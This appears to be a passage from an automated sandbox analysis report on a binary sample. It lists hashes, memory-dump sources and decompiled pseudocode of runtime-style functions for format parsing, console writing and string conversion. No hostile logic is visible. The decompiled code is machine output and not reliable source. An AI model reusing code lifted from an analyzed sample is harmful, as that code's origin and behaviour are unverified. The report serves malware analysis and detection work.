Instruction Fuzzy Hash: 80026072E002299FDF14CFA8D9806ADFBF5EF58324F24826AE555E7280D731AD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A33107, Relevance: .2, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E00A33107() {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __esp;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				unsigned int _t79;
				signed char _t80;
				unsigned int _t81;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				void* _t90;
				void* _t91;
				signed char _t93;
				void* _t96;
				void* _t98;
				void* _t100;
				intOrPtr _t101;
				unsigned int _t103;
				void* _t104;
				signed char _t105;
				void* _t106;
				void* _t113;
				signed char _t114;
				void* _t115;
				signed int _t116;
				signed int* _t117;
				void* _t120;
				void* _t123;
				void* _t125;
				void* _t128;
				void* _t129;

				_t91 = _t90;
				_t123 = _t125;
				_push(_t98);
				_push(_t91);
				_t120 = _t98;
				_t93 = 1;
				_t49 =  *((char*)(_t120 + 0x31));
				_t128 = _t49 - 0x64;
				if(_t128 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t100 = _t120;
							_t51 = E00A337FF(_t100);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t120 + 0x30));
								if( *((char*)(_t120 + 0x30)) == 0) {
									_t114 =  *(_t120 + 0x20);
									_push(_t115);
									 *((short*)(_t123 - 4)) = 0;
									_t116 = 0;
									 *((char*)(_t123 - 2)) = 0;
									_t54 = _t114 >> 4;
									__eflags = _t93 & _t54;
									if((_t93 & _t54) == 0) {
										L46:
										_t101 =  *((intOrPtr*)(_t120 + 0x31));
										__eflags = _t101 - 0x78;
										if(_t101 == 0x78) {
											L48:
											_t56 = _t114 >> 5;
											__eflags = _t93 & _t56;
											if((_t93 & _t56) != 0) {
												L50:
												__eflags = _t101 - 0x61;
												if(_t101 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t93;
													if(_t93 != 0) {
														L56:
														 *((char*)(_t123 + _t116 - 4)) = 0x30;
														__eflags = _t101 - 0x58;
														if(_t101 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t123 + _t116 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t116 = _t116 + 2;
															__eflags = _t116;
															L61:
															_t96 =  *((intOrPtr*)(_t120 + 0x24)) -  *((intOrPtr*)(_t120 + 0x38)) - _t116;
															__eflags = _t114 & 0x0000000c;
															if((_t114 & 0x0000000c) == 0) {
																E00A329D0(_t120 + 0x448, 0x20, _t96, _t120 + 0x18);
																_t125 = _t125 + 0x10;
															}
															_push( *((intOrPtr*)(_t120 + 0xc)));
															_push(_t120 + 0x18);
															_push(_t116);
															_push(_t123 - 4);
															E00A339F9(_t120 + 0x448, _t114);
															_t103 =  *(_t120 + 0x20);
															_t117 = _t120 + 0x18;
															_t67 = _t103 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t105 = _t103 >> 2;
																__eflags = _t105 & 0x00000001;
																if((_t105 & 0x00000001) == 0) {
																	E00A329D0(_t120 + 0x448, 0x30, _t96, _t117);
																	_t125 = _t125 + 0x10;
																}
															}
															_push(0);
															_t104 = _t120;
															E00A33952(_t96, _t104, _t114, _t117, _t120);
															__eflags =  *_t117;
															if( *_t117 >= 0) {
																_t71 =  *(_t120 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E00A329D0(_t120 + 0x448, 0x20, _t96, _t117);
																}
															}
															_t69 = 1;
															L70:
															_push(_t123);
															return _t69;
														}
														__eflags = _t101 - 0x41;
														if(_t101 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t101 - 0x41;
												if(_t101 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t93 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t101 - 0x58;
										if(_t101 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t79 = _t114;
									_t80 = _t79 >> 6;
									__eflags = _t93 & _t80;
									if((_t93 & _t80) == 0) {
										__eflags = _t93 & _t114;
										if((_t93 & _t114) == 0) {
											_t81 = _t114;
											_t82 = _t81 >> 1;
											__eflags = _t93 & _t82;
											if((_t93 & _t82) == 0) {
												goto L46;
											}
											 *((char*)(_t123 - 4)) = 0x20;
											L45:
											_t116 = _t93;
											goto L46;
										}
										 *((char*)(_t123 - 4)) = 0x2b;
										goto L45;
									}
									 *((char*)(_t123 - 4)) = 0x2d;
									goto L45;
								}
								_t69 = _t93;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t106 = _t120;
							_t51 = E00A3360A(_t106, _t115, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E00A337E7(_t120);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E00A33420(_t93, _t120, _t113);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t120 + 0x20;
						 *_t2 =  *(_t120 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E00A33754(_t113);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E00A337C8(_t120);
					goto L10;
				}
				if(_t128 == 0) {
					goto L27;
				}
				_t129 = _t49 - 0x58;
				if(_t129 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E00A333BD(_t120);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E00A3357A(_t93, _t120, __eflags, 0);
					goto L10;
				}
				if(_t129 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00a33108
0x00a3310b
0x00a3310c
0x00a3310d
0x00a3310f
0x00a33113
0x00a33116
0x00a3311a
0x00a3311d
0x00a3318b
0x00a3318e
0x00a331dd
0x00a331dd
0x00a331e0
0x00a3314d
0x00a3314e
0x00a3314f
0x00a33154
0x00a33156
0x00a331fb
0x00a331ff
0x00a33208
0x00a3320d
0x00a3320e
0x00a33212
0x00a33214
0x00a33219
0x00a3321c
0x00a3321e
0x00a33247
0x00a33247
0x00a3324a
0x00a3324d
0x00a33254
0x00a33256
0x00a33259
0x00a3325b
0x00a3325f
0x00a3325f
0x00a33262
0x00a3326d
0x00a3326d
0x00a3326f
0x00a3326f
0x00a33271
0x00a33277
0x00a33277
0x00a3327c
0x00a3327f
0x00a3328a
0x00a3328a
0x00a3328c
0x00a3328c
0x00a33297
0x00a3329b
0x00a3329b
0x00a3329e
0x00a332a4
0x00a332a6
0x00a332a9
0x00a332b9
0x00a332be
0x00a332be
0x00a332c1
0x00a332c7
0x00a332c8
0x00a332d2
0x00a332d3
0x00a332d8
0x00a332db
0x00a332e0
0x00a332e3
0x00a332e5
0x00a332e7
0x00a332ea
0x00a332ed
0x00a332fa
0x00a332ff
0x00a332ff
0x00a332ed
0x00a33302
0x00a33305
0x00a33306
0x00a3330b
0x00a3330e
0x00a33313
0x00a33316
0x00a33318
0x00a33325
0x00a3332a
0x00a33318
0x00a3332d
0x00a33330
0x00a33332
0x00a33335
0x00a33335
0x00a33281
0x00a33284
0x00000000
0x00000000
0x00a33286
0x00000000
0x00a33286
0x00a33273
0x00a33275
0x00000000
0x00000000
0x00000000
0x00a33275
0x00a33264
0x00a33267
0x00000000
0x00000000
0x00a33269
0x00000000
0x00a33269
0x00a3325d
0x00a3325d
0x00a3325d
0x00000000
0x00a3325d
0x00a3324f
0x00a33252
0x00000000
0x00000000
0x00000000
0x00a33252
0x00a33221
0x00a33222
0x00a33225
0x00a33227
0x00a3322f
0x00a33231
0x00a3323a
0x00a3323b
0x00a3323d
0x00a3323f
0x00000000
0x00000000
0x00a33241
0x00a33245
0x00a33246
0x00000000
0x00a33246
0x00a33233
0x00000000
0x00a33233
0x00a33229
0x00000000
0x00a33229
0x00a33201
0x00000000
0x00a33201
0x00a3315c
0x00a3315c
0x00000000
0x00a3315c
0x00a331e7
0x00a331e7
0x00a331ea
0x00a331bc
0x00a331bc
0x00a331bd
0x00a331bf
0x00a331c0
0x00a331c1
0x00000000
0x00a331c1
0x00a331ec
0x00a331ef
0x00000000
0x00000000
0x00a331f5
0x00a33164
0x00a33164
0x00000000
0x00a33164
0x00a33190
0x00a331d3
0x00000000
0x00a331d3
0x00a33192
0x00a33195
0x00a331c8
0x00a331ca
0x00000000
0x00a331ca
0x00a33197
0x00a3319a
0x00a331b8
0x00a331b8
0x00a331b8
0x00a331b8
0x00000000
0x00a331b8
0x00a3319c
0x00a3319f
0x00a331b1
0x00000000
0x00a331b1
0x00a331a1
0x00a331a4
0x00000000
0x00000000
0x00a331a8
0x00000000
0x00a331a8
0x00a3311f
0x00000000
0x00000000
0x00a33125
0x00a33128
0x00a33168
0x00a33168
0x00a3316b
0x00a33184
0x00000000
0x00a33184
0x00a3316d
0x00a3316d
0x00a33170
0x00000000
0x00000000
0x00a33173
0x00a33176
0x00000000
0x00000000
0x00a33178
0x00a3317b
0x00000000
0x00a3317b
0x00a3312a
0x00a33163
0x00000000
0x00a33163
0x00a3312f
0x00000000
0x00000000
0x00a33138
0x00000000
0x00000000
0x00a3313d
0x00000000
0x00000000
0x00a33142
0x00000000
0x00000000
0x00a3314b
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a28701fe311d5a5bb7206acc82ebb21427319dc48b16b9dbd2169ae991c3a3dc
Instruction ID: e19f02916544d452c91bdaa06954c9550723b6a5fbac5b1834f6099eeec8f22a
Opcode Fuzzy Hash: a28701fe311d5a5bb7206acc82ebb21427319dc48b16b9dbd2169ae991c3a3dc
Instruction Fuzzy Hash: 1D515C7320D7456AEF3487AC8996BFFA7989B23340F14071AF582DB282C655DF899321

Uniqueness

Uniqueness Score: -1.00%

Function 00A4D125, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: e5f0443f2b686ca8a04c3e52f8c75a904e669894e4ef6298dfc6f012820368d9
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 6441A271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A4D015, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
Instruction ID: 4d4123ea14ff81197e32492980e767b147e2bf4e8da409eca58bcd78dbdc4516
Opcode Fuzzy Hash: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
Instruction Fuzzy Hash: 85015478A01209EFCB84DF98C5909AEF7F5FF88310F208599E819A7745D731AE52DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A4CFB5, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
Instruction ID: 235b6c66c54de6cd9345f76ec3e03dde2ef9b473dde25f63a33ead1e81e35894
Opcode Fuzzy Hash: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
Instruction Fuzzy Hash: 58019278A01209EFCB84DF98C5909AEF7B6FB88310F208599E819A7701D730AE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A4CD05, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c83a6b6a472ec04d6c9d5fb753ffd229562f112202eda93caf714974bbbe2610
Instruction ID: 86aec8c642195c009cd9072ef78842332febacaa6f40efce056e019aba34e340
Opcode Fuzzy Hash: c83a6b6a472ec04d6c9d5fb753ffd229562f112202eda93caf714974bbbe2610
Instruction Fuzzy Hash: 3BE0DF7AB411198BC780CE15D880D43BBAAFBC8370B6286B0C91D87306D930EEC386D1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4AA25, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15ff068d13780fd1e14ed77d9b2288a960dc8c12459815adbd4a0f50a6978dbf
Instruction ID: bbefdfdc615322c02e3b0cf7242cb9d021ccbcc8632e463688465c18aafeac2a
Opcode Fuzzy Hash: 15ff068d13780fd1e14ed77d9b2288a960dc8c12459815adbd4a0f50a6978dbf
Instruction Fuzzy Hash: 1CE05E7165A608DFD755CF6CCA4A769B3F8EB04344F1044B5A40CC7640E679DE44D645

Uniqueness

Uniqueness Score: -1.00%

Function 00A4AA65, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4647825b990181084a681119cc8b4d8cc719e59a0805c041bd11273eb0d49655
Instruction ID: b65e058be6b02409207b076f866651d459dc3313a7eb8a0ff40b4a40d7372f20
Opcode Fuzzy Hash: 4647825b990181084a681119cc8b4d8cc719e59a0805c041bd11273eb0d49655
Instruction Fuzzy Hash: 73D05E31A66208DFD742CF68CA06B5AB3FCE704384F1088B5E409C7250E679DE40D682

Uniqueness

Uniqueness Score: -1.00%

Function 00A344D5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A34486,?,?,00A34426,?,00A46878,0000000C,00A3457D,?,00000002), ref: 00A344F5
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A34508
FreeLibrary.KERNEL32(00000000,?,?,?,00A34486,?,?,00A34426,?,00A46878,0000000C,00A3457D,?,00000002,00000000), ref: 00A3452B

Strings

CorExitProcess, xrefs: 00A34500
mscoree.dll, xrefs: 00A344EE

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f291adb657c9d25090943177b83e267418364c062f6889932e60588b889252ec
Instruction ID: cf27d501d68c9e13cefbcd6eb2caa4503d0c58581068957322969928efb99f75
Opcode Fuzzy Hash: f291adb657c9d25090943177b83e267418364c062f6889932e60588b889252ec
Instruction Fuzzy Hash: D4F06239A40108BBCB119FE0EC49BEEBFB4EB89756F400165F405A2150DB325EC1CA51

Uniqueness

Uniqueness Score: -1.00%

Function 00A39D26, Relevance: 7.7, APIs: 5, Instructions: 154
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00A39D26(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t113;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed char _t125;
				signed char _t130;
				intOrPtr _t131;
				signed int _t133;
				signed char* _t135;
				intOrPtr* _t138;
				signed int _t140;
				void* _t141;

				_t78 =  *0xa4dc28; // 0x4f268f78
				_v8 = _t78 ^ _t140;
				_t80 = _a8;
				_t119 = _t80;
				_t120 = _t119 >> 6;
				_t117 = (_t80 & 0x0000003f) * 0x30;
				_push(__edi);
				_t135 = _a12;
				_v52 = _t135;
				_v48 = _t120;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xa4ea08 + _t120 * 4)) + _t117 + 0x18));
				_v40 = _a16 + _t135;
				_t86 = GetConsoleCP();
				_t138 = _a4;
				_v60 = _t86;
				 *_t138 = 0;
				 *((intOrPtr*)(_t138 + 4)) = 0;
				 *((intOrPtr*)(_t138 + 8)) = 0;
				while(_t135 < _v40) {
					_v28 = 0;
					_v31 =  *_t135;
					_t131 =  *((intOrPtr*)(0xa4ea08 + _v48 * 4));
					_t125 =  *(_t131 + _t117 + 0x2d);
					if((_t125 & 0x00000004) == 0) {
						if(( *(E00A3871B(_t135) + ( *_t135 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t135);
							goto L8;
						} else {
							if(_t135 >= _v40) {
								_t133 = _v48;
								 *((char*)( *((intOrPtr*)(0xa4ea08 + _t133 * 4)) + _t117 + 0x2e)) =  *_t135;
								 *( *((intOrPtr*)(0xa4ea08 + _t133 * 4)) + _t117 + 0x2d) =  *( *((intOrPtr*)(0xa4ea08 + _t133 * 4)) + _t117 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t138 + 4)) =  *((intOrPtr*)(_t138 + 4)) + 1;
							} else {
								_t113 = E00A361E2( &_v28, _t135, 2);
								_t141 = _t141 + 0xc;
								if(_t113 != 0xffffffff) {
									_t135 =  &(_t135[1]);
									goto L9;
								}
							}
						}
					} else {
						_t130 = _t125 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t131 + _t117 + 0x2e));
						_push(2);
						_v15 = _t130;
						 *(_t131 + _t117 + 0x2d) = _t130;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00A361E2();
						_t141 = _t141 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t135 =  &(_t135[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t138 = GetLastError();
								} else {
									 *((intOrPtr*)(_t138 + 4)) =  *((intOrPtr*)(_t138 + 8)) - _v52 + _t135;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t138 + 8)) =  *((intOrPtr*)(_t138 + 8)) + 1;
													 *((intOrPtr*)(_t138 + 4)) =  *((intOrPtr*)(_t138 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00A31B61(_v8 ^ _t140);
			}

0x00a39d2e
0x00a39d35
0x00a39d38
0x00a39d3c
0x00a39d40
0x00a39d44
0x00a39d4f
0x00a39d50
0x00a39d53
0x00a39d56
0x00a39d5d
0x00a39d65
0x00a39d68
0x00a39d6e
0x00a39d74
0x00a39d79
0x00a39d7b
0x00a39d7e
0x00a39d83
0x00a39d8d
0x00a39d94
0x00a39d97
0x00a39d9e
0x00a39da5
0x00a39dd1
0x00a39df7
0x00a39df9
0x00000000
0x00a39dd3
0x00a39dd6
0x00a39e9d
0x00a39ea9
0x00a39eb4
0x00a39eb9
0x00a39ddc
0x00a39de3
0x00a39de8
0x00a39dee
0x00a39df4
0x00000000
0x00a39df4
0x00a39dee
0x00a39dd6
0x00a39da7
0x00a39dab
0x00a39dae
0x00a39db4
0x00a39db6
0x00a39db9
0x00a39dbd
0x00a39dfa
0x00a39dfd
0x00a39dfe
0x00a39e03
0x00a39e09
0x00a39e0f
0x00a39e1e
0x00a39e24
0x00a39e2a
0x00a39e2f
0x00a39e4b
0x00a39ebe
0x00a39ec4
0x00a39e4d
0x00a39e55
0x00a39e5e
0x00a39e64
0x00000000
0x00a39e66
0x00a39e68
0x00a39e6b
0x00a39e84
0x00000000
0x00a39e86
0x00a39e8a
0x00a39e8c
0x00a39e8f
0x00000000
0x00a39e8f
0x00a39e8a
0x00a39e84
0x00a39e64
0x00a39e5e
0x00a39e4b
0x00a39e2f
0x00a39e09
0x00000000
0x00a39e92
0x00a39e92
0x00a39ec6
0x00a39ed8

APIs

GetConsoleCP.KERNEL32(00000000,00005C05,?,?,?,?,?,?,?,00A3A49B,?,00005C05,00000000,00005C05,00005C05,?), ref: 00A39D68
WideCharToMultiByte.KERNEL32(?,?,00005C05,00000001,00000000,00000005), ref: 00A39E24
WriteFile.KERNEL32(?,00000000,00000000,00A3A49B,00000000,?,00005C05,00000001,00000000,00000005), ref: 00A39E43
WriteFile.KERNEL32(?,?,00000001,00A3A49B,00000000,?,00005C05,00000001,00000000,00000005), ref: 00A39E7C

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite$ByteCharConsoleMultiWide
String ID:
API String ID: 977765425-0
Opcode ID: e4e1b16fb384008b86ce233af287af4c79f1f2dec578afe61e7b91f745e0d5b2
Instruction ID: 6421a867bbf0ca2f98c3d2fbe3cdb3a65d265e956c431797d75f0a8309941606
Opcode Fuzzy Hash: e4e1b16fb384008b86ce233af287af4c79f1f2dec578afe61e7b91f745e0d5b2
Instruction Fuzzy Hash: 1D51B075900249AFDB10CFA8D885AEFBBF8FF49300F24415AF955E7291E7719981CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A389C8, Relevance: 7.6, APIs: 5, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00A389C8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t34;
				signed int _t40;
				signed int _t41;
				int _t48;
				int _t55;
				void* _t58;
				int _t60;
				signed int _t66;
				short* _t75;
				short* _t76;
				short* _t77;
				signed int _t79;
				void* _t81;
				short* _t82;

				_push(__edi);
				_pop(_t70);
				_t79 = _t81;
				_t82 = _t81 - 0x18;
				_t34 =  *0xa4dc28; // 0x4f268f78
				 *(_t79 - 4) = _t34 ^ _t79;
				E00A32AB4(_t79 - 0x18, __edx,  *((intOrPtr*)(_t79 + 8)));
				_t60 =  *(_t79 + 0x1c);
				if(_t60 == 0) {
					_t6 =  *((intOrPtr*)(_t79 - 0x14)) + 8; // 0xec8b5561
					_t55 =  *_t6;
					_t60 = _t55;
					 *(_t79 + 0x1c) = _t55;
				}
				_t40 = MultiByteToWideChar(_t60, 1 + (0 |  *((intOrPtr*)(_t79 + 0x20)) != 0x00000000) * 8,  *(_t79 + 0x10),  *(_t79 + 0x14), 0, 0);
				 *(_t79 - 8) = _t40;
				_t41 = _t40;
				if(_t41 == 0) {
					L15:
					if( *((char*)(_t79 - 0xc)) != 0) {
						 *( *((intOrPtr*)(_t79 - 0x18)) + 0x350) =  *( *((intOrPtr*)(_t79 - 0x18)) + 0x350) & 0xfffffffd;
					}
					return E00A31B61( *(_t79 - 4) ^ _t79);
				}
				_t58 = _t41 + _t41;
				asm("sbb eax, eax");
				if((_t58 + 0x00000008 & _t41) == 0) {
					_push(0);
					_pop(_t75);
					L11:
					_t76 = _t75;
					if(_t76 != 0) {
						E00A31E90(0, _t76, 0, _t58);
						_t48 = MultiByteToWideChar( *(_t79 + 0x1c), 1,  *(_t79 + 0x10),  *(_t79 + 0x14), _t76,  *(_t79 - 8));
						if(_t48 != 0) {
							0 = GetStringTypeW( *(_t79 + 0xc), _t76, _t48,  *(_t79 + 0x18));
						}
					}
					L14:
					E00A38AE5(_t76);
					goto L15;
				}
				asm("sbb eax, eax");
				_t50 = _t41 & _t58 + 0x00000008;
				_t66 = _t58 + 8;
				if((_t41 & _t58 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t77 = E00A34CDB(_t66, 0, _t50 & _t66);
					_t76 = _t77;
					if(_t76 == 0) {
						goto L14;
					}
					 *_t76 = 0xdddd;
					L9:
					_t75 =  &(_t76[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00A3F1E0();
				_t76 = _t82;
				if(_t76 == 0) {
					goto L14;
				}
				 *_t76 = 0xcccc;
				goto L9;
			}

0x00a389c8
0x00a389c9
0x00a389cc
0x00a389cd
0x00a389d0
0x00a389d7
0x00a389e3
0x00a389e8
0x00a389ed
0x00a389f2
0x00a389f2
0x00a389f5
0x00a389f7
0x00a389f7
0x00a38a15
0x00a38a1b
0x00a38a1e
0x00a38a20
0x00a38abf
0x00a38ac3
0x00a38ac8
0x00a38ac8
0x00a38ae4
0x00a38ae4
0x00a38a26
0x00a38a2e
0x00a38a32
0x00a38a7e
0x00a38a7f
0x00a38a80
0x00a38a80
0x00a38a82
0x00a38a87
0x00a38aa4
0x00a38aa6
0x00a38ab7
0x00a38ab7
